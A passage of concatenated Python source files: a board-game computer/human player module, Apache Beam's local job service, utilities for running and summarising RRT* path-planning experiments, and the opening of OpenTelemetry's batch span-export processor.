def choose_next_move(self, node: TwoPlayerGameMonteCarloTreeSearchNode, game_window: GameWindow):
""" 选择下一步
:param
node: 当前棋局走势的节点(蒙特卡洛模拟树的一个节点)
:return: 下一个棋局走势的节点
"""
raise NotImplemented()
@abc.abstractmethod
def __repr__(self):
raise NotImplemented()
class ComputerPlayer(Player):
def choose_next_move(self, node, game_window):
""" 选择人机的下一步,并在窗口显示
:param node: 当前蒙特卡洛树的节点
:param game_window: GameWindow 游戏窗口
:return: TwoPlayerGameMonteCarloTreeSearchNode 最新的蒙特卡洛节点
"""
print("人机下棋:")
start = time.time()
search = AlphaBetaAndSimulator(node)
simulator_number = 6000
# 开启线程进行人机下棋模拟
simulations_thread = Thread(target=search.best_action, args=(simulator_number,))
simulations_thread.start()
simulations_thread.join()
new_node = search.root.best_child
game_window.move_and_update(new_node.state.pre_action)
end = time.time()
print("用时:", end-start)
return new_node
def __repr__(self):
return "Computer"
class HumanPlayer(Player):
def choose_next_move(self, node, game_window):
""" 选择人的下一步,并在窗口显示
:param node: 当前蒙特卡洛树的节点
:param game_window: GameWindow 游戏窗口
:return: TwoPlayerGameMonteCarloTreeSearchNode 最新的蒙特卡洛节点
"""
print("人下棋:")
action = game_window.getHumanMove()
new_state = node.state.place(action)
new_node = TwoPlayerGameMonteCarloTreeSearchNode(new_state, node)
return new_node
def __repr__(self):
return "Human"
|
local_job_service.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import logging
import os
import queue
import shutil
import subprocess
import tempfile
import threading
import time
import traceback
from builtins import object
from typing import TYPE_CHECKING
from typing import List
from typing import Optional
import grpc
from google.protobuf import text_format # type: ignore # not in typeshed
from apache_beam.metrics import monitoring_infos
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.portability import abstract_job_service
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.portability.api import beam_runner_api_pb2
_LOGGER = logging.getLogger(__name__)
def _iter_queue(q):
while True:
yield q.get(block=True)
class LocalJobServicer(abstract_job_service.AbstractJobServiceServicer):
"""Manages one or more pipelines, possibly concurrently.
Experimental: No backward compatibility guaranteed.
Servicer for the Beam Job API.
This JobService uses a basic local implementation of runner to run the job.
This JobService is not capable of managing job on remote clusters.
By default, this JobService executes the job in process but still uses GRPC
to communicate pipeline and worker state. It can also be configured to use
inline calls rather than GRPC (for speed) or launch completely separate
subprocesses for the runner and worker(s).
"""
def __init__(self, staging_dir=None):
super(LocalJobServicer, self).__init__()
self._cleanup_staging_dir = staging_dir is None
self._staging_dir = staging_dir or tempfile.mkdtemp()
self._artifact_service = artifact_service.BeamFilesystemArtifactService(
self._staging_dir)
self._artifact_staging_endpoint = None # type: Optional[endpoints_pb2.ApiServiceDescriptor]
def create_beam_job(self,
preparation_id, # stype: str
job_name, # type: str
pipeline, # type: beam_runner_api_pb2.Pipeline
options # type: struct_pb2.Struct
):
# type: (...) -> BeamJob
# TODO(angoenka): Pass an appropriate staging_session_token. The token can
# be obtained in PutArtifactResponse from JobService
if not self._artifact_staging_endpoint:
# The front-end didn't try to stage anything, but the worker may
# request what's here so we should at least store an empty manifest.
self._artifact_service.CommitManifest(
beam_artifact_api_pb2.CommitManifestRequest(
staging_session_token=preparation_id,
manifest=beam_artifact_api_pb2.Manifest()))
provision_info = fn_api_runner.ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
job_id=preparation_id,
job_name=job_name,
pipeline_options=options,
retrieval_token=self._artifact_service.retrieval_token(
preparation_id)),
self._staging_dir)
return BeamJob(
preparation_id,
pipeline,
options,
provision_info,
self._artifact_staging_endpoint)
def get_bind_address(self):
"""Return the address used to open the port on the gRPC server.
This is often, but not always the same as the service address. For
example, to make the service accessible to external machines, override this
to return '[::]' and override `get_service_address()` to return a publicly
accessible host name.
"""
return self.get_service_address()
def get_service_address(self):
"""Return the host name at which this server will be accessible.
In particular, this is provided to the client upon connection as the
artifact staging endpoint.
"""
return 'localhost'
def start_grpc_server(self, port=0):
self._server = grpc.server(UnboundedThreadPoolExecutor())
port = self._server.add_insecure_port(
'%s:%d' % (self.get_bind_address(), port))
beam_job_api_pb2_grpc.add_JobServiceServicer_to_server(self, self._server)
beam_artifact_api_pb2_grpc.add_ArtifactStagingServiceServicer_to_server(
self._artifact_service, self._server)
hostname = self.get_service_address()
self._artifact_staging_endpoint = endpoints_pb2.ApiServiceDescriptor(
url='%s:%d' % (hostname, port))
self._server.start()
_LOGGER.info('Grpc server started at %s on port %d' % (hostname, port))
return port
def stop(self, timeout=1):
self._server.stop(timeout)
if os.path.exists(self._staging_dir) and self._cleanup_staging_dir:
shutil.rmtree(self._staging_dir, ignore_errors=True)
def GetJobMetrics(self, request, context=None):
if request.job_id not in self._jobs:
raise LookupError("Job {} does not exist".format(request.job_id))
result = self._jobs[request.job_id].result
monitoring_info_list = []
for mi in result._monitoring_infos_by_stage.values():
monitoring_info_list.extend(mi)
# Filter out system metrics
user_monitoring_info_list = [
x for x in monitoring_info_list
if monitoring_infos._is_user_monitoring_info(x) or
monitoring_infos._is_user_distribution_monitoring_info(x)
]
return beam_job_api_pb2.GetJobMetricsResponse(
metrics=beam_job_api_pb2.MetricResults(
committed=user_monitoring_info_list))
class SubprocessSdkWorker(object):
"""Manages a SDK worker implemented as a subprocess communicating over grpc.
"""
def __init__(self,
worker_command_line, # type: bytes
control_address,
worker_id=None
):
self._worker_command_line = worker_command_line
self._control_address = control_address
self._worker_id = worker_id
def run(self):
logging_server = grpc.server(UnboundedThreadPoolExecutor())
logging_port = logging_server.add_insecure_port('[::]:0')
logging_server.start()
logging_servicer = BeamFnLoggingServicer()
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
logging_servicer, logging_server)
logging_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url='localhost:%s' % logging_port))
control_descriptor = text_format.MessageToString(
endpoints_pb2.ApiServiceDescriptor(url=self._control_address))
env_dict = dict(
os.environ,
CONTROL_API_SERVICE_DESCRIPTOR=control_descriptor,
LOGGING_API_SERVICE_DESCRIPTOR=logging_descriptor
)
# only add worker_id when it is set.
if self._worker_id:
env_dict['WORKER_ID'] = self._worker_id
with fn_api_runner.SUBPROCESS_LOCK:
p = subprocess.Popen(
self._worker_command_line,
shell=True,
env=env_dict)
try:
p.wait()
if p.returncode:
raise RuntimeError(
'Worker subprocess exited with return code %s' % p.returncode)
finally:
if p.poll() is None:
p.kill()
logging_server.stop(0)
class BeamJob(abstract_job_service.AbstractBeamJob):
"""This class handles running and managing a single pipeline.
The current state of the pipeline is available as self.state.
"""
def __init__(self,
job_id, # type: str
pipeline,
options,
provision_info, # type: fn_api_runner.ExtendedProvisionInfo
artifact_staging_endpoint # type: Optional[endpoints_pb2.ApiServiceDescriptor]
):
super(BeamJob, self).__init__(
job_id, provision_info.provision_info.job_name, pipeline, options)
self._provision_info = provision_info
self._artifact_staging_endpoint = artifact_staging_endpoint
self._state_queues = [] # type: List[queue.Queue]
self._log_queues = [] # type: List[queue.Queue]
self.daemon = True
self.result = None
def set_state(self, new_state):
"""Set the latest state as an int enum and notify consumers"""
timestamp = super(BeamJob, self).set_state(new_state)
if timestamp is not None:
# Inform consumers of the new state.
for queue in self._state_queues:
queue.put((new_state, timestamp))
def prepare(self):
pass
def artifact_staging_endpoint(self):
return self._artifact_staging_endpoint
def run(self):
self.set_state(beam_job_api_pb2.JobState.STARTING)
self._run_thread = threading.Thread(target=self._run_job)
self._run_thread.start()
def _run_job(self):
self.set_state(beam_job_api_pb2.JobState.RUNNING)
with JobLogHandler(self._log_queues):
try:
result = fn_api_runner.FnApiRunner(
provision_info=self._provision_info).run_via_runner_api(
self._pipeline_proto)
_LOGGER.info('Successfully completed job.')
self.set_state(beam_job_api_pb2.JobState.DONE)
self.result = result
except: # pylint: disable=bare-except
_LOGGER.exception('Error running pipeline.')
_LOGGER.exception(traceback)
self.set_state(beam_job_api_pb2.JobState.FAILED)
raise
def cancel(self):
if not self.is_terminal_state(self.state):
self.set_state(beam_job_api_pb2.JobState.CANCELLING)
# TODO(robertwb): Actually cancel...
self.set_state(beam_job_api_pb2.JobState.CANCELLED)
def get_state_stream(self):
# Register for any new state changes.
state_queue = queue.Queue()
self._state_queues.append(state_queue)
for state, timestamp in self.with_state_history(_iter_queue(state_queue)):
yield state, timestamp
if self.is_terminal_state(state):
break
def get_message_stream(self):
# Register for any new messages.
log_queue = queue.Queue()
self._log_queues.append(log_queue)
self._state_queues.append(log_queue)
for msg in self.with_state_history(_iter_queue(log_queue)):
if isinstance(msg, tuple):
assert len(msg) == 2 and isinstance(msg[0], int)
current_state = msg[0]
yield msg
if self.is_terminal_state(current_state):
break
else:
yield msg
class BeamFnLoggingServicer(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
def Logging(self, log_bundles, context=None):
for log_bundle in log_bundles:
for log_entry in log_bundle.log_entries:
_LOGGER.info('Worker: %s', str(log_entry).replace('\n', ' '))
return iter([])
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.CRITICAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, log_queues):
super(JobLogHandler, self).__init__()
self._last_id = 0
self._logged_thread = None
self._log_queues = log_queues
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
msg = beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime('%Y-%m-%d %H:%M:%S.',
time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))
# Inform all message consumers.
for queue in self._log_queues:
queue.put(msg)
|
utils.py
|
import os
import re
import numpy as np
import pandas as pd
from typing import Tuple, List, Union, Optional, Iterable
from collections import defaultdict, OrderedDict
from PIL import Image
from tqdm import tqdm
from functools import reduce
import operator
import multiprocessing
import json
from itertools import product
import path
from path.rrt_base import RRTBase, PathDescription
from path.rrt_star import RRTStar
class Report(object):
def __init__(self, map_name: str):
self.map_name = map_name
self.first = defaultdict(list)
self.best = defaultdict(list)
self.costs = []
self.path_lengths = []
self.pad_len = 0
self.samples_taken = []
self.nodes_taken = []
def update(self,
first_path: PathDescription,
best_path: PathDescription,
costs: List[float], paths: List[int],
samples: List[int], nodes: List[int]):
best_dict = best_path()
for ct_name, ct_value in first_path().items():
if ct_name != 'path':
self.first[ct_name].append(ct_value)
self.best[ct_name].append(best_dict[ct_name])
self.pad_len = max(self.pad_len, len(costs))
self.costs.append(costs)
self.path_lengths.append(paths)
self.samples_taken.append(samples)
self.nodes_taken.append(nodes)
@staticmethod
def get_mean_std(a: np.ndarray, axis: int = 0):
mu = np.nanmean(a, axis=axis)
std = np.nanstd(a, axis=axis)
return mu.tolist(), std.tolist()
def __call__(self):
for i in range(len(self.costs)):
l = self.pad_len - len(self.costs[i])
if l > 0:
self.costs[i].extend([np.nan] * l)
self.path_lengths[i].extend([np.nan] * l)
if not isinstance(self.costs, np.ndarray):
self.costs = np.vstack(self.costs)
self.path_lengths = np.vstack(self.path_lengths)
self.samples_taken = np.array(self.samples_taken)
self.nodes_taken = np.array(self.nodes_taken)
mean_costs, std_costs = self.get_mean_std(self.costs)
mean_paths, std_paths = self.get_mean_std(self.path_lengths)
mean_samples, std_samples = self.get_mean_std(self.samples_taken)
mean_nodes, std_nodes = self.get_mean_std(self.nodes_taken)
report_dict = {'map_name': self.map_name,
'first': self.first,
'best': self.best,
'costs': {'mean': mean_costs, 'std': std_costs},
'paths': {'mean': mean_paths, 'std': std_paths},
'samples': {'mean': mean_samples, 'std': std_samples},
'nodes': {'mean': mean_nodes, 'std': std_nodes}
}
return report_dict
def get_n_results(data_folder: str = '../data',
results_folder: str = 'results',
results_file: str = 'result.csv') -> int:
results_file = os.path.join(data_folder, results_folder, results_file)
roi_description = pd.read_csv(results_file, header=None)
return roi_description.shape[0] - 1
def process_all_results(map_params: dict,
rrt_params: dict,
mu: float = 0.1,
gamma: float = 10.,
n: int = 50,
output_dir: str = 'logs',
output_fname: str = 'logs.txt'):
seen_maps = set()
n_results = get_n_results(map_params['data_folder'],
map_params['results_folder'],
map_params['results_file'])
if not os.path.exists(output_dir):
os.makedirs(output_dir)
output_path = os.path.join(output_dir, output_fname)
with tqdm(total=n_results) as pbar:
with open(output_path, 'w') as f:
for i in range(n_results):
map_params['result_row_id'] = i
out = get_map_and_task(**map_params)
map_name = out['grid_map'].split('/')[-1]
if map_name in seen_maps:
continue
pbar.write('Processing map {}...'.format(map_name))
seen_maps.add(map_name)
data = {
'grid_map': process_image(out['grid_map']),
'xy_init': out['xy_init'],
'xy_goal': out['xy_goal'],
'dist_init_goal': out['euclid']
}
roi_data = {'roi': roi_from_image(out['pred_roi']),
'mu': mu}
rewire_params = {'gamma': gamma}
report1 = run_experiment(map_name, RRTStar,
{**data, **rrt_params, **rewire_params}, n)
report2 = run_experiment(map_name, RRTStar,
{**data, **rrt_params, **roi_data, **rewire_params}, n)
f.write(json.dumps(report1))
f.write('\n')
f.write(json.dumps(report2))
f.write('\n')
pbar.update(1)
def get_map_and_task(data_folder: str = '../data',
maps_folder: str = 'maps',
results_folder: str = 'results',
results_file: str = 'result.csv',
result_row_id: int = 0) -> dict:
results_file = os.path.join(data_folder, results_folder, results_file)
roi_description = pd.read_csv(results_file, header=None,
skiprows=result_row_id + 1, nrows=1)
true_roi = roi_description.iloc[0, 0]
pred_roi = re.split('[\\\\/]', roi_description.iloc[0, 1])
if len(pred_roi) == 3:
pred_roi = pred_roi[2]
else:
pred_roi = pred_roi[1]
dataset_folder, tasks_folder, map_name, task_roi_name = re.split('[\\\\/]', true_roi)
map_path = os.path.join(data_folder,
dataset_folder,
maps_folder,
map_name + '.png')
task_path = os.path.join(data_folder,
dataset_folder,
tasks_folder,
map_name + '.csv')
task_idx = int(task_roi_name.split('_')[1])
task_description = pd.read_csv(task_path, header=None,
skiprows=task_idx + 1, nrows=1).values.tolist()[0]
x0, y0, x1, y1 = list(map(int, task_description[:-1]))
euclid = task_description[-1]
true_roi_path = os.path.join(data_folder, dataset_folder,
tasks_folder, map_name, task_roi_name)
pred_roi_path = os.path.join(data_folder, results_folder, pred_roi)
return {'grid_map': map_path,
'true_roi': true_roi_path,
'pred_roi': pred_roi_path,
'xy_init': (x0, y0),
'xy_goal': (x1, y1),
'euclid': euclid}
def rgb2binary(img: np.ndarray) -> np.ndarray:
return (img[..., :] > 150).astype(float)
def process_image(load_dir: str) -> np.ndarray:
img = Image.open(load_dir).convert('RGB')
data = rgb2binary(np.array(img))
return data
def roi_from_image(load_dir: str) -> List[Tuple[int, int]]:
roi_data = process_image(load_dir)
mask = roi_data[..., 0] * roi_data[..., 2]
roi = list(zip(*np.where(mask == 0)))
return roi
def wrapper(algo: RRTBase, proc_num: int, return_dict: dict):
algo.run()
return_dict[proc_num] = algo
def run_experiment(map_name: str, algorithm: RRTBase, params: dict, n: int = 50):
report = Report(map_name)
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for seed in range(n):
params['seed'] = seed
algo = algorithm(**params)
p = multiprocessing.Process(target=wrapper, args=(algo, seed, return_dict))
jobs.append(p)
p.start()
with tqdm(total=n) as pbar:
for p in jobs:
p.join()
pbar.update(1)
for algo in return_dict.values():
report.update(algo.first_path,
algo.best_path,
algo.costs_history,
algo.path_lengths_history,
algo.samples_taken_history,
algo.nodes_taken_history)
return report()
def get_by_keys(log_dict: dict,
keys: list) -> Union[Iterable, dict]:
return reduce(operator.getitem, keys, log_dict)
def set_by_keys(log_dict: dict,
keys: list):
value = get_by_keys(log_dict, keys[:-1])[keys[-1]]
get_by_keys(log_dict, keys[:-1])[keys[-1]] = [value]
def rename(name: str, pattern: str):
pattern = re.compile(pattern)
num = re.findall(pattern, name)[0]
name = name.replace(num, str(int(num) // 10)).split('.')[0]
return name
def collect_stats_by_maps(log_dir: str,
log_file: str,
pattern: Optional[str] = None):
seen_maps = set()
log_dict_rrt_s = OrderedDict()
log_dict_rrt_s_h = OrderedDict()
log_path = os.path.join(log_dir, log_file)
with open(log_path) as f:
while True:
rrt_s_line = f.readline()
if not rrt_s_line:
break
rrt_s_dict = json.loads(rrt_s_line.rstrip('\n'))
rrt_s_h_dict = json.loads(f.readline().rstrip('\n'))
map_name = rrt_s_dict['map_name']
if pattern is not None:
map_name = rename(map_name, pattern)
del rrt_s_dict['map_name']
del rrt_s_h_dict['map_name']
if map_name not in seen_maps:
seen_maps.add(map_name)
for key in rrt_s_dict:
for key_ in rrt_s_dict[key]:
rrt_s_dict[key][key_] = [rrt_s_dict[key][key_]]
rrt_s_h_dict[key][key_] = [rrt_s_h_dict[key][key_]]
log_dict_rrt_s[map_name] = rrt_s_dict
log_dict_rrt_s_h[map_name] = rrt_s_h_dict
else:
for key in rrt_s_dict:
for key_ in rrt_s_dict[key]:
log_dict_rrt_s[map_name][key][key_].append(rrt_s_dict[key][key_])
log_dict_rrt_s_h[map_name][key][key_].append(rrt_s_h_dict[key][key_])
for map_name in log_dict_rrt_s:
for key in log_dict_rrt_s[map_name]:
for key_ in log_dict_rrt_s[map_name][key]:
# list of lists, get mean
counts = log_dict_rrt_s[map_name][key][key_]
counts_h = log_dict_rrt_s_h[map_name][key][key_]
# for padding
l = max(map(lambda x: len(x), counts))
l_h = max(map(lambda x: len(x), counts_h))
for i, lst in enumerate(counts):
cur_l = l - len(lst)
if cur_l > 0:
counts[i] = lst + [np.nan] * cur_l
for i, lst in enumerate(counts_h):
cur_l = l_h - len(lst)
if cur_l > 0:
counts_h[i] = lst + [np.nan] * cur_l
counts = np.array(np.vstack(counts)).astype(float)
counts_h = np.array(np.vstack(counts_h)).astype(float)
counts[counts == float('inf')] = np.nan
counts_h[counts_h == float('inf')] = np.nan
counts = np.nanmean(counts, axis=0).tolist()
counts_h = np.nanmean(counts_h, axis=0).tolist()
log_dict_rrt_s[map_name][key][key_] = counts
log_dict_rrt_s_h[map_name][key][key_] = counts_h
output_filename = os.path.join(log_dir, '_'.join(['collected_stats', log_file]))
with open(output_filename, 'w') as f:
for map_name in log_dict_rrt_s:
map_dict = {'map_name': map_name}
rrt_s_dict = {**map_dict, **log_dict_rrt_s[map_name]}
f.write(json.dumps(rrt_s_dict))
f.write('\n')
rrt_s_h_dict = {**map_dict, **log_dict_rrt_s_h[map_name]}
f.write(json.dumps(rrt_s_h_dict))
f.write('\n')
return output_filename
def get_stats_table(map_name: str,
pad_len: int,
counts: list):
map_name = [map_name.split('.')[0]] * 2 * pad_len
algo_type = ['RRT*-uniform'] * pad_len + ['RRT*-ROI'] * pad_len
return np.vstack((map_name, algo_type, counts))
def get_stats_table_by_keys(log_dir: str,
log_file: str,
keys: List[str],
csv_name: str):
tables = []
log_path = os.path.join(log_dir, log_file)
with open(log_path) as f:
while True:
rrt_s_line = f.readline()
if not rrt_s_line:
break
rrt_s = json.loads(rrt_s_line.rstrip('\n'))
rrt_s_h = json.loads(f.readline().rstrip('\n'))
stats_s = get_by_keys(rrt_s, keys)
stats_s_h = get_by_keys(rrt_s_h, keys)
map_name = rrt_s['map_name'].split('.')[0]
table = get_stats_table(map_name, len(stats_s), stats_s + stats_s_h)
tables.append(table)
tables = np.hstack(tables).T
df = pd.DataFrame(tables, columns=['map_name', 'algo_type', 'counts'])
df[['counts']] = df[['counts']].astype(float)
df.to_csv(os.path.join(log_dir, csv_name))
return df
def get_plot_data_by_keys(log_dir: str,
log_file: str,
keys: List[str]) -> dict:
plot_data = {}
log_path = os.path.join(log_dir, log_file)
with open(log_path) as f:
while True:
rrt_s_line = f.readline()
if not rrt_s_line:
break
rrt_s = json.loads(rrt_s_line.rstrip('\n'))
rrt_s_h = json.loads(f.readline().rstrip('\n'))
data = get_by_keys(rrt_s, keys)
data_h = get_by_keys(rrt_s_h, keys)
map_name = rrt_s['map_name'].split('.')[0]
plot_data[map_name] = {'uniform': data, 'roi': data_h}
return plot_data
def csv_and_plots_from_logs(log_dir: str,
log_file: str,
collect_stats: bool = False,
pattern: str = '\d+'):
if collect_stats:
_, log_file = os.path.split(collect_stats_by_maps(log_dir, log_file, pattern))
prefix = '_'.join(log_file.split('_')[:-1])
for path_type, metric_name in product(path.PATH_TYPES, path.PATH_METRICS_KEYS):
csv_name = f'{prefix}_{path_type}_{metric_name}.csv'
get_stats_table_by_keys(log_dir, log_file, [path_type, metric_name], csv_name)
for metric_name in path.RUNS_METRICS:
plot_data = get_plot_data_by_keys(log_dir, log_file, [metric_name])
plot_file = f'{prefix}_{metric_name}.plot'
output = os.path.join(log_dir, plot_file)
with open(output, 'w') as f:
f.write(json.dumps(plot_data))
f.write('\n')
|
__init__.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import os
import sys
import threading
import typing
from enum import Enum
from opentelemetry.configuration import Configuration
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.trace import Span, SpanProcessor
from opentelemetry.util import time_ns
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
SUCCESS = 0
FAILURE = 1
class SpanExporter:
"""Interface for exporting spans.
Interface to be implemented by services that want to export recorded in
its own format.
To export data this MUST be registered to the :class`opentelemetry.sdk.trace.Tracer` using a
`SimpleExportSpanProcessor` or a `BatchExportSpanProcessor`.
"""
def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
"""Exports a batch of telemetry data.
Args:
spans: The list of `opentelemetry.trace.Span` objects to be exported
Returns:
The result of the export
"""
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class SimpleExportSpanProcessor(SpanProcessor):
"""Simple SpanProcessor implementation.
SimpleExportSpanProcessor is an implementation of `SpanProcessor` that
passes ended spans directly to the configured `SpanExporter`.
"""
def __init__(self, span_exporter: SpanExporter):
self.span_exporter = span_exporter
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if not span.context.trace_flags.sampled:
return
token = attach(set_value("suppress_instrumentation", True))
try:
self.span_exporter.export((span,))
# pylint: disable=broad-except
except Exception:
logger.exception("Exception while exporting Span.")
detach(token)
def shutdown(self) -> None:
self.span_exporter.shutdown()
def force_flush(self, timeout_millis: int = 30000) -> bool:
# pylint: disable=unused-argument
return True
class _FlushRequest:
"""Represents a request for the BatchExportSpanProcessor to flush spans."""
__slots__ = ["event", "num_spans"]
def __init__(self):
self.event = threading.Event()
self.num_spans = 0
class BatchExportSpanProcessor(SpanProcessor):
"""Batch span processor implementation.
BatchExportSpanProcessor is an implementation of `SpanProcessor` that
batches ended spans and pushes them to the configured `SpanExporter`.
"""
def __init__(
self,
span_exporter: SpanExporter,
max_queue_size: int = None,
schedule_delay_millis: float = None,
max_export_batch_size: int = None,
export_timeout_millis: float = None,
):
if max_queue_size is None:
max_queue_size = Configuration().get("BSP_MAX_QUEUE_SIZE", 2048)
if schedule_delay_millis is None:
schedule_delay_millis = Configuration().get(
"BSP_SCHEDULE_DELAY_MILLIS", 5000
)
if max_export_batch_size is None:
max_export_batch_size = Configuration().get(
"BSP_MAX_EXPORT_BATCH_SIZE", 512
)
if export_timeout_millis is None:
export_timeout_millis = Configuration().get(
"BSP_EXPORT_TIMEOUT_MILLIS", 30000
)
if max_queue_size <= 0:
raise ValueError("max_queue_size must be a positive integer.")
if schedule_delay_millis <= 0:
raise ValueError("schedule_delay_millis must be positive.")
if max_export_batch_size <= 0:
raise ValueError(
"max_export_batch_size must be a positive integer."
)
if max_export_batch_size > max_queue_size:
raise ValueError(
"max_export_batch_size must be less than or equal to max_queue_size."
)
self.span_exporter = span_exporter
self.queue = collections.deque(
[], max_queue_size
) # type: typing.Deque[Span]
self.worker_thread = threading.Thread(target=self.worker, daemon=True)
self.condition = threading.Condition(threading.Lock())
self._flush_request = None # type: typing.Optional[_FlushRequest]
self.schedule_delay_millis = schedule_delay_millis
self.max_export_batch_size = max_export_batch_size
self.max_queue_size = max_queue_size
self.export_timeout_millis = export_timeout_millis
self.done = False
# flag that indicates that spans are being dropped
self._spans_dropped = False
# precallocated list to send spans to exporter
self.spans_list = [
None
] * self.max_export_batch_size # type: typing.List[typing.Optional[Span]]
self.worker_thread.start()
def on_start(
self, span: Span, parent_context: typing.Optional[Context] = None
) -> None:
pass
def on_end(self, span: Span) -> None:
if self.done:
logger.warning("Already shutdown, dropping span.")
return
if not span.context.trace_flags.sampled:
return
if len(self.queue) == self.max_queue_size:
if not self._spans_dropped:
logger.warning("Queue is full, likely spans will be dropped.")
self._spans_dropped = True
self.queue.appendleft(span)
if len(self.queue) >= self.max_queue_size // 2:
with self.condition:
self.condition.notify()
def worker(self):
timeout = self.schedule_delay_millis / 1e3
flush_request = None # type: typing.Optional[_FlushRequest]
while not self.done:
with self.condition:
if self.done:
# done flag may have changed, avoid waiting
break
flush_request = self._get_and_unset_flush_request()
if (
len(self.queue) < self.max_export_batch_size
and flush_request is None
):
self.condition.wait(timeout)
flush_request = self._get_and_unset_flush_request()
if not self.queue:
# spurious notification, let's wait again, reset timeout
timeout = self.schedule_delay_millis / 1e3
self._notify_flush_request_finished(flush_request)
flush_request = None
continue
if self.done:
# missing spans will be sent when calling flush
break
# subtract the duration of this export call to the next timeout
start = time_ns()
self._export(flush_request)
end = time_ns()
duration = (end - start) / 1e9
timeout = self.schedule_delay_millis / 1e3 - duration
self._notify_flush_request_finished(flush_request)
flush_request = None
# there might have been a new flush request while export was running
# and before the done flag switched to true
with self.condition:
shutdown_flush_request = self._get_and_unset_flush_request()
# be sure that all spans are sent
self._drain_queue()
self._notify_flush_request_finished(flush_request)
self._notify_flush_request_finished(shutdown_flush_request)
def _get_and_unset_flush_request(self,) -> typing.Optional[_FlushRequest]:
"""Returns the current flush request and makes it invisible to the
worker thread for subsequent calls.
"""
flush_request = self._flush_request
self._flush_request = None
if flush_request is not None:
flush_request.num_spans = len(self.queue)
return flush_request
@staticmethod
def _notify_flush_request_finished(
flush_request: typing.Optional[_FlushRequest],
):
"""Notifies the flush initiator(s) waiting on the given request/event
that the flush operation was finished.
"""
if flush_request is not None:
flush_request.event.set()
def _get_or_create_flush_request(self) -> _FlushRequest:
"""Either returns the current active flush event or creates a new one.
The flush event will be visible and read by the worker thread before an
export operation starts. Callers of a flush operation may wait on the
returned event to be notified when the flush/export operation was
finished.
This method is not thread-safe, i.e. callers need to take care about
synchronization/locking.
"""
if self._flush_request is None:
self._flush_request = _FlushRequest()
return self._flush_request
def _export(self, flush_request: typing.Optional[_FlushRequest]):
"""Exports spans considering the given flush_request.
In case of a given flush_requests spans are exported in batches until
the number of exported spans reached or exceeded the number of spans in
the flush request.
In no flush_request was given at most max_export_batch_size spans are
exported.
"""
if not flush_request:
self._export_batch()
return
num_spans = flush_request.num_spans
while self.queue:
num_exported = self._export_batch()
num_spans -= num_exported
if num_spans <= 0:
break
def _export_batch(self) -> int:
"""Exports at most max_export_batch_size spans and returns the number of
exported spans.
"""
idx = 0
# currently only a single thread acts as consumer, so queue.pop() will
# not raise an exception
while idx < self.max_export_batch_size and self.queue:
self.spans_list[idx] = self.queue.pop()
idx += 1
token = attach(set_value("suppress_instrumentation", True))
try:
# Ignore type b/c the Optional[None]+slicing is too "clever"
# for mypy
self.span_exporter.export(self.spans_list[:idx]) # type: ignore
except Exception: # pylint: disable=broad-except
logger.exception("Exception while exporting Span batch.")
detach(token)
# clean up list
for index in range(idx):
self.spans_list[index] = None
return idx
def _drain_queue(self):
""""Export all elements until queue is empty.
Can only be called from the worker thread context because it invokes
`export` that is not thread safe.
"""
while self.queue:
self._export_batch()
def force_flush(self, timeout_millis: int = None) -> bool:
if timeout_millis is None:
timeout_millis = self.export_timeout_millis
if self.done:
